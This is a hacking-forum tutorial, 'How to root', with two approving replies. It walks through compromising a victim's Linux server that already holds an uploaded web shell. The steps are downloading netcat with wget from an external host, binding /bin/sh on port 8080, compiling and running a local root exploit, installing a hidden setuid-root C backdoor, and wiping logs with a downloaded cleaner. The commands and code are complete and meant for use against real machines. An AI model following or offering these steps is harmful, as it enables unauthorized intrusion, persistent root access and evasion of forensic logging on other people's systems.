How to root

[paxnWo]

Required for this tutorial:

Access to a shell - Upload by any-means a shell onto a box 
mig-log cleaner - [URL]http://b14ck1c3.freehostia.com/miglc[/URL] 
Netcat - [URL]http://www.vulnwatch.org/netcat/nc111nt.zip[/URL] 
Netcat(unix) - [URL]http://b14ck1c3.freehostia.com/nc[/URL] 
Local Root Exploit - [URL]http://jshooter.by.ru/xpl/[/URL]

half a brain

willingness to learn

Now that you have all that in order lets begin.

Go to the path of or access your shell by whatever means nessecary.

Make sure that your shell is in a writable folder just to make things

easy for us. In our case today for this tutorial we will be using

storm7shell not exactly my favorite but will get the job done none the less.

An example of this location would be something like:

[URL]http://target/youshell.php[/URL]

Now that we are on your shells page we want to find out what os this box is

running and what version the kernel is. In our case it's linux 2.6.8. So we

will want to find a local root exploit for this kernel version of the linux os.

What we want to do now that we have our local root exploit for our kernel

is spawn a shell so that we can talk to the victim's box and run our commands

without interuption, But how are we suppose to do that? This can be done by

using a tool called Netcat. So now that we have a copy of Netcat we will go to

the shell, Find the command execution area of the shell and enter:

wget [URL]http://b14ck1c3.freehostia.com/nc[/URL]

What this will do is download the file of Netcat i have pre-compiled and hosted

for you onto the victim box to the location of your shell. Once we have the download

complete we will want to chmod it so that our user has access to run it. which can

be done by entering:

chmod +x nc

What this does is grants everyone (user, group and other) execute permission, and the

command to the file nc which we had just previously downloaded onto the box with the

wget command.

Now that we have nc installed on both the victim machine and your own it's time to make

our connection. How Do we make a connection with nc? In the command execution area of your

shell enter:

./nc -l -p 8080 -e /bin/sh 

(shell can be /bin/sh or cmd.exe for example)

And then on the netcat installed on your pc you will want to enter:

nc VictimIP Port *in our case 8080*

eg 123.123.123.123 8080

What this will do is cause the netcat on the victims box to listen on port 8080 and shovel

back an interactive shell for you once you make the connection from which you typed:

nc victimip port

Now that We have our interactive shell spawned we can start to prepare the box for rooting.

First we will want to get our local root exploit onto the box and get it compiled if it's

not already. This can be done by once again using that nifty wget command we learned about

in the previous steps.

wget [URL]http://yoursite/xpl[/URL]

What we have done is now downloaded your exploit. If your exploit is not already compiled you

will need to compile it in order to run it. Compiling your exploit can be done by using the gcc,

like so:

gcc xpl.c -o xpl;chmod +x xpl

This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy

of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on.

The exploit will vary on their usage so make sure you have an understanding of the root exploit

you are using. You can run your xpl file by entering in:

./xpl

Wait until your exploit is finished running once it is done enter:

whoami

What the whoami command does is tells you who you are if this tells you root then you xpl has done

it's job and you now have root priv's on the box. or you can type:

id

which will give you something like:

uid=0(root) gid=0(root) groups=500(apache) or something similar

And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make

sure that we can come and go as we please without all the hassel of rooting the box over and over. So

we will want to create some kind of backdoor.

we can make this happen with few lines of code:

#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <unistd.h> 

int main( void ) 
{ 
     setuid( 0 ); 
     system( "/bin/bash" ); 

     return 0; 
}

Compile it and change permissions:

root@foobar /root# gcc -o .bkdr main.c 
root@foobar /root# chown root:root .bkdr 
root@foobar /root# chmod +s .bkdr

Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably

in the $PATH) and if you execute it as another user:

raif@foobar /home/raif$ /usr/local/bin/.bkdr

root@foobar /home/raif# whoami

root

Now you have your access back.

Alright we are almost completed our mission we have successfully rooted our victims box created our

backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This

can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you

can get here:

[URL]http://b14ck1c3.freehostia.com/miglc[/URL]

Once again we can use our wget command to upload our logcleaner to the rooted box.

wget [URL]http://b14ck1c3.freehostia.com/miglc;chmod[/URL] +x miglc

now just run the logcleaner

./miglc

The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner

so you may choose how exactly you want to clean the logs with the commands given to you.

Credits : w3tw0rk

[MrRip]

Good job paxnWo . You bring us very interesting tutorials . Congrats

[noes]

Thanks,

very good tutorial. Covering all steps needed...

Can you please update the local exploits links?

...I can not get one for solaris 5.9

Merci.